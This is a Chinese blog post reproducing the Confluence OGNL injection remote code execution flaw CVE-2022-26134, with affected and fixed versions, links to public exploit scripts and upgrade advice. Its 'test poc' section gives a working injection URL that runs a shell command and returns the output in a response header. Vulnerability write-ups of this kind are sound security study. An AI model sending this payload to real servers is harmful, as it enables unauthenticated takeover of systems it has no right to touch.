CVE-2022-26134 Confluence远程命令执行漏洞复现

最新推荐文章于 2025-03-13 18:14:23 发布
最新推荐文章于 2025-03-13 18:14:23 发布
阅读量7.8k 收藏 8
点赞数 3
分类专栏: web安全评估 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/125130838
版权
Confluence是一款企业知识管理和协同软件,近期被曝存在远程代码执行漏洞,影响多个版本。攻击者无需认证即可注入恶意ONGl表达式执行任意代码。受影响版本包括7.4.17之前的部分版本。安全版本已更新为7.4.17等。建议用户尽快升级至安全版本或参照官方建议进行修复,以避免潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Confluence介绍

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。

受影响版本​

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1

安全版本

Confluence Server and Data Center 7.4.17 
Confluence Server and Data Center 7.13.7 
Confluence Server and Data Center 7.14.3 
Confluence Server and Data Center 7.15.2 
Confluence Server and Data Center 7.16.4 
Confluence Server and Data Center 7.17.4 
Confluence Server and Data Center 7.18.1

测试poc

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("' command '").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

脚本地址

https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py

https://github.com/crowsec-edtech/CVE-2022-26134/blob/main/exploit.py

本地复现

在这里插入图片描述
使用脚本结果:
在这里插入图片描述

手动复现结果

在这里插入图片描述

wireshark流量展示

在这里插入图片描述
本来自己也写了一个脚本,但是发现其实没有人家写的好,这两个脚本对报错异常处理的不是很好,
\CVE-2022-26134-main\exploit.py", line 45, in
print(exploit(target, cmd))

KeyError: ‘x-cmd-response’

如果出现类似以上的错误,大家不要慌,说明这个版本是安全的,脚本是没问题的哈

修复建议

升级到Atlassian Confluence Server and Data Center至安全版本。

下载链接:

https://www.atlassian.com/software/confluence/download-archives

若是无法升级,可以参考官方建议,进行相对的修改

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
李火火的安全圈
06-06 2392
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence CVE-2022-26134 RCE漏洞
4SecNet团队专栏
04-22 1311
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 1055
Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞复现
网安君的博客
06-07 3320
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
渗透测试的域渗透之CVE-2022-26923提权
最新发布
没有网络安全就没有国家安全
03-13 1127
渗透测试的域渗透之CVE-2022-26923提权
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134复现
热门推荐
weixin_42489549的博客
06-29 1万+
CVE-2022-26134 Confluence远程命令执行漏洞复现
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5461
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
ATLASSIAN CONFLUENCE 远程代码执行漏洞CVE-2022-26134漏洞复现
Websec
06-07 1345
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
m0_72717546的博客
09-26 559
Confluence是一个专业的知识库协同工具,它可以进行企业知识管理与软件协同,是一个利于构建企业WIKI的Web应用。Confluence使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。是企业中强大的信息读取、存放的共享平台。在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。
漏洞复现CVE-2022-26134 Atlassian Confluence_远程代码执行
m0_53121608的博客
07-13 248
漏洞复现CVE-2022-26134 Atlassian Confluence_远程代码执行
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 3181
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3606
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
CVE-2022-26134 Confluence OGNL 注入漏洞检测
DBA大董的博客
06-05 1834
CVE-2022-261342022年6月4号新发布的漏洞,360安全中心描述如下: 在上一篇 CVE-2022-26134 Confluence OGNL 注入漏洞处理 中介绍了如何进行修复。那么修复完,如何测试修复成功了呢? 给大家介绍一款工具:CVE-2022-26134使用方法超简单:...
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3212
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134远程代码执行漏洞
confluence漏洞复现
Shanfenglan's blog
12-02 4162
文章目录1. confluence路径穿越与命令之执行 (CVE-2019-3396)1.1 利用2. Confluence OGNL表达式注入代码执行漏洞CVE-2021-26084)2.1 利用参考文章 1. confluence路径穿越与命令之执行 (CVE-2019-3396) 影响版本:6.14.2版本前 通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 1.1 利用 POST /rest/tinymce/1/macro/preview HTTP/1.1 Host
Confluence OGNL 注入漏洞CVE-2022-26134复现
crowsec
06-09 1300
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。漏洞仅限本地复现使用,请遵守网络安全法律法规,违者使用与本程序开发者无关...
Atlassian Confluence 远程代码执行漏洞复现CVE-2021-26084)
0xSec
01-17 1695
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
CVE-2022-26134 Confluence OGNL 注入复现及后利用
Love&Share
04-07 3348
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进行计算(攻击者提供的url被间接转化成了OGNL表达式进行计算)
近红外高光谱数据集划分python
02-26
### 使用Python对近红外高光谱数据集进行划分 对于处理和分割近红外高光谱数据集的任务,可以采用多种方法来实现训练集、测试集以及验证集之间的合理分配。一种常见的方式是利用 `scikit-learn` 库中的函数来进行随机抽样划分[^1]。 ```python from sklearn.model_selection import train_test_split import numpy as np # 假设 X 是特征矩阵, y 是标签向量 X, y = np.random.rand(100, 224), np.random.randint(0, 2, size=(100,)) # 将数据划分为70% 训练集 和 30% 测试集 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42) print(f'Training set shape {X_train.shape}') print(f'Testing set shape {X_test.shape}') ``` 当涉及到更复杂的场景时,比如时间序列或者空间上连续的数据样本,则可能需要考虑特定的应用背景下的特殊需求。例如,在某些情况下为了保持类别的分布一致性,还可以通过设置参数 stratify 来确保类别比例相同[^2]: ```python # 如果希望维持不同类别间的比例一致 X_train_stratified, X_test_stratified, y_train_stratified, y_test_stratified = \ train_test_split(X, y, test_size=0.3, random_state=42, stratify=y) ``` 如果面对的是具有地理坐标的高光谱图像,并且想要避免同一位置上的像素被分到不同的集合里去影响模型评估效果的话,那么就需要自定义更加精细的数据切分逻辑了。这通常涉及先按照地理位置聚类再做进一步操作[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值